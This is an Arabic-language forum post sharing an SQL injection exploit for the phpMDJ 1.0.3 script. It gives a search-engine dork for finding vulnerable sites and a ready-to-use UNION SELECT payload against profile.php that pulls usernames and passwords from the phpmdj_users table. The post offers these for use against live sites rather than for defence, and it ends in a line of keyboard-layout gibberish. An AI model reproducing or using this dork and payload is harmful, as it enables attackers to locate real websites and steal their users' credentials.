[align=center]السلام عليكم ورحمة الله وبركاته
جبت لكم اليوم ثغرة في سكريبت phpMDJ 1.0.3
الثغرة من نوع SQL INJECTION
الذي يعشقها الكثير
نبدأ
دورك البحث عن المواقع المصابة
كود PHP:
DORK: Inurl:"profile.php?id
طريقة الإستغلال
كود PHP:
tp://site/path/profile.php?id=-1 union select 1,2,3,mdp,5,6,pseudo,8,9,10,11,12,13,14,15,16 FROM phpmdj_users where id=1--
الثغرة من إكتشاف k4cp3r and Ablus
إن شاء الله تستفيدوا
موفقين بإذن الله ...[/align]
eyvm td s;vdfj phpMDJ 1>0>3